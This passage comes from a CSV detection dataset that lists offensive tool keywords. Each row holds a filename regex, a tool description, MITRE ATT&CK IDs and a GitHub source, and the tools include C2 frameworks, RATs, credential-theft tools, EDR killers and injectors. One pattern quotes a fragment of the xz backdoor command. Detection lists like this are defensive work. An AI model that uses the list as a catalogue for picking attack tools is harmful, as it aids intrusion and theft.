TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamserver-win.zip*",".{0,1000}\/teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamspeak2-version.nse*",".{0,1000}\/teamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/teamstracker.db*",".{0,1000}\/teamstracker\.db.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/teamstracker.git*",".{0,1000}\/teamstracker\.git.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/teamstracker.py*",".{0,1000}\/teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - 
TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/TelegramRAT.git*",".{0,1000}\/TelegramRAT\.git.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*/telnet_cdata_ftth_backdoor_userpass.txt*",".{0,1000}\/telnet_cdata_ftth_backdoor_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/telnet-brute.nse*",".{0,1000}\/telnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-encryption.nse*",".{0,1000}\/telnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-ntlm-info.nse*",".{0,1000}\/telnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/terminate/Terminator.sys*",".{0,1000}\/terminate\/Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*/test_privesc.py*",".{0,1000}\/test_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - 
TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/test32.dll*",".{0,1000}\/test32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/test64.dll*",".{0,1000}\/test64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|*",".{0,1000}\/tests\/files\/good\-large_compressed\.lzma\|eval\s\$i\|tail\s\-c\s\+31265\|.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A" "*/tests/NIST_CAVS/*.rsp*",".{0,1000}\/tests\/NIST_CAVS\/.{0,1000}\.rsp.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/tests/test-bof.ps1*",".{0,1000}\/tests\/test\-bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files 
mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/tevora-threat/PowerView*",".{0,1000}\/tevora\-threat\/PowerView.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*/TFG/src/helpers/execve_hijack*",".{0,1000}\/TFG\/src\/helpers\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*/tftp-enum.nse*",".{0,1000}\/tftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TGSThief.git*",".{0,1000}\/TGSThief\.git.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/TGSThief/*",".{0,1000}\/TGSThief\/.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/tgtParse.py*",".{0,1000}\/tgtParse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/tgtParse/tgtParse.*",".{0,1000}\/tgtParse\/tgtParse\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/thc-hydra/*",".{0,1000}\/thc\-hydra\/.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","9028","1885","2024-04-01T12:18:49Z","2014-04-24T14:45:37Z" "*/the-backdoor-factory.git*",".{0,1000}\/the\-backdoor\-factory\.git.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*/TheFatRat*",".{0,1000}\/TheFatRat.{0,1000}","offensive_tool_keyword","TheFatRat","Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.","T1027 - T1059 - T1105 - T1218","TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/Screetsec/TheFatRat","1","0","N/A","N/A","10","8922","2233","2024-03-17T12:09:38Z","2016-07-24T10:30:19Z" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/theHarvester.py*",".{0,1000}\/theHarvester\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - 
T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/Theif.dll*",".{0,1000}\/Theif\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","1","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*/ThemeBleed.exe*",".{0,1000}\/ThemeBleed\.exe.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gabe-k/themebleed","1","0","N/A","10","2","179","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z" "*/thief.py*",".{0,1000}\/thief\.py.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*/thirdparty/msf/*",".{0,1000}\/thirdparty\/msf\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/ThisIsNotRat.git*",".{0,1000}\/ThisIsNotRat\.git.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","61","20","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*/thoth.git*",".{0,1000}\/thoth\.git.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*/thread-injector.exe*",".{0,1000}\/thread\-injector\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/ThreadlessInject.git*",".{0,1000}\/ThreadlessInject\.git.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*/Thread-Pool-Injection-PoC.git*",".{0,1000}\/Thread\-Pool\-Injection\-PoC\.git.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in 
Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","8","1","70","9","2024-02-11T18:45:31Z","2024-01-24T07:42:08Z" "*/ThreatCheck.git*",".{0,1000}\/ThreatCheck\.git.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*/Throwback.git*",".{0,1000}\/Throwback\.git.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*/ThrowbackDLL/*",".{0,1000}\/ThrowbackDLL\/.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*/ThunderDNS*",".{0,1000}\/ThunderDNS.{0,1000}","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","1","N/A","10","10","404","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" "*/ticket_converter.py*",".{0,1000}\/ticket_converter\.py.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" 
"*/ticketConverter.exe*",".{0,1000}\/ticketConverter\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/ticketConverter.py*",".{0,1000}\/ticketConverter\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ticketer.py -*",".{0,1000}\/ticketer\.py\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - 
TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/ticketer.py*",".{0,1000}\/ticketer\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/ticketsplease.py*",".{0,1000}\/ticketsplease\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/TikiLoader/*",".{0,1000}\/TikiLoader\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
